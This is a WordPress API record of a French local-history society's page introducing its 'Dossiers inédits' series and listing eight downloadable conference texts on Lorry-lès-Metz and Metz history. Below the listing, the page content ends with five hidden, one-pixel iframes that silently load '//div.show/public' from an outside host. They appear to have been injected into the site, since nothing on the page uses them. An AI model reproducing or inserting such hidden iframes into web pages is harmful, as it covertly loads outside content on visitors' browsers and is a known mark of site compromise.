{"id":7528,"date":"2023-12-19T18:51:03","date_gmt":"2023-12-19T17:51:03","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7528"},"modified":"2026-01-31T10:06:14","modified_gmt":"2026-01-31T09:06:14","slug":"les-dossiers-de-lauriacum","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7528","title":{"rendered":"<em>Les Dossiers in\u00e9dits<\/em>"},"content":{"rendered":"<p>Sous l\u2019appellation <em>Les Dossiers in\u00e9dits<\/em>, vous trouverez divers documents : ce sont des compl\u00e9ments \u00e0 notre <em>Bulletin<\/em>, o\u00f9 tout ne peut pas \u00eatre publi\u00e9, majoritairement pour des raisons financi\u00e8res.<\/p>\n<p>Ces <em>Dossiers in\u00e9dits<\/em> collectent les textes avec iconographie des conf\u00e9rences que nous avons donn\u00e9es.<\/p>\n<p>Cette nouvelle publication a pour but de conserver la parole des conf\u00e9renciers, un des crit\u00e8res de base \u00e9tant que le sujet de l\u2019intervention ne fasse pas l\u2019objet d\u2019une publication. Y seront adjoints d\u2019importants documents int\u00e9ressants (et jamais publi\u00e9s) sur diff\u00e9rents sujets historiques et locaux\u2026 bien s\u00fbr.<\/p>\n<p>Les illustrations et les textes ne sont pas libres de droits, ils sont la propri\u00e9t\u00e9 des auteurs ou de Lorry-l\u00e8s-Metz \u00ab au fil du temps \u00bb. Si vous reproduisez tout ou partie d\u2019un document, veuillez respecter la l\u00e9gislation sur les droits d\u2019auteur et citer vos sources.<\/p>\n<p>Les <em>Dossiers in\u00e9dits<\/em> sont \u00e0 votre disposition, vous pouvez les t\u00e9l\u00e9charger et les diffuser librement. Nous en avons soign\u00e9 la pr\u00e9sentation, \u00e0 l\u2019image de celle du <em>Bulletin,<\/em> et vous pouvez les imprimer pour votre usage personnel.<\/p>\n<p>Si vous envisagez d\u2019en faire cadeau, nous pouvons les confier \u00e0 notre imprimeur, qui les tirera sur le m\u00eame papier que notre revue, et nous vous les vendrons \u00e0 prix coutant.<\/p>\n<p>Bienvenue dans <em>Les Dossiers in\u00e9dits<\/em>, nous vous souhaitons de belles heures de lecture\u2009!<\/p>\n<p>ISSN : 3037-9741<\/p>\n<table style=\"height: 96px; width: 100%; border-collapse: collapse; padding: 2px;\">\n<tbody>\n<tr>\n<td style=\"width: 5.39562%;\">8<\/td>\n<td style=\"width: 17.2682%;\">Conf\u00e9rence du<br \/>\n21 septembre 2013<\/td>\n<td style=\"width: 27.9465%;\">Monsieur Schuman, mon voisin<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2025\/12\/8-Monsieur-Schuman-mon-voisin.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png?_t=1745927426\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8789\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 5.39562%;\">7<\/td>\n<td style=\"width: 17.2682%;\">Conf\u00e9rence du<br \/>\n8 novembre 2024<\/td>\n<td style=\"width: 27.9465%;\">Les aum\u00f4niers militaires<br \/>\ndans la garnison de Metz de 1802 \u00e0 1870<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2025\/04\/7-Les-aumoniers-militaires.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png?_t=1745927426\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8742\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 5.39562%;\">6<\/td>\n<td style=\"width: 17.2682%;\">Visite du 4 aout 2013<\/td>\n<td style=\"width: 27.9465%;\">L\u2019origine possible du staphylier<br \/>\n\u00e0 Lorry-l\u00e8s-Metz<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2025\/03\/6-Lorigine-possible-du-staphylier-a-Lorry-les-Metz.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8736\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 5.39562%;\">5<\/td>\n<td style=\"width: 17.2682%;\">Colloque du 15 avril 2019<\/td>\n<td style=\"width: 27.9465%;\">Gabriel Poir\u00e9 et les Lorriots \u00e0 Carcassonne<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2024\/11\/5-Gabriel-Poire-et-les-Lorriots-a-Carcassonne.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8036\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 5.39562%;\">4<\/td>\n<td style=\"width: 17.2682%;\">Colloque du 4 novembre 2023<\/td>\n<td style=\"width: 27.9465%;\">La statuaire messine disparue<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2024\/10\/4-Les-statues-messines-disparues.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png?_t=1730656024\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=7872\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 5.39562%;\">3<\/td>\n<td style=\"width: 17.2682%;\">Colloque du 4 novembre 2023<\/td>\n<td style=\"width: 27.9465%;\">La d\u00e9signation du Soldat inconnu<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2024\/10\/3-La-designation-du-Soldat-inconnu.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=7866\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a>\n<p>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 5.39562%;\">2<\/td>\n<td style=\"width: 17.2682%;\">Conf\u00e9rence du 15 septembre 2013<\/td>\n<td style=\"width: 27.9465%;\">Les orgues de l\u2019\u00e9glise de Lorry-l\u00e8s-Metz<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2024\/05\/2-Les-orgues.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=2889\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 5.39562%;\">1<\/td>\n<td style=\"width: 17.2682%;\">Conf\u00e9rence th\u00e9\u00e2tralis\u00e9e du 19\u00a0juin\u00a02009<\/td>\n<td style=\"width: 27.9465%;\">Sc\u00e9nario de la conf\u00e9rence th\u00e9\u00e2tralis\u00e9e donn\u00e9e pour le bicentenaire du rattachement de Vigneulles \u00e0 Lorry-l\u00e8s-Metz<\/td>\n<td style=\"width: 22.6571%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2024\/05\/1-Rattachement-de-Vigneulles-a-Lorry.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><br \/>\n<a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=7550\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Sous l\u2019appellation Les Dossiers in\u00e9dits, vous trouverez divers documents : ce sont des compl\u00e9ments \u00e0 notre Bulletin, o\u00f9 tout ne peut pas \u00eatre publi\u00e9, majoritairement pour des raisons financi\u00e8res. Ces Dossiers in\u00e9dits collectent les textes avec iconographie des conf\u00e9rences que&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":159,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-7528","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7528"}],"version-history":[{"count":10,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7528\/revisions"}],"predecessor-version":[{"id":8835,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7528\/revisions\/8835"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/159"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}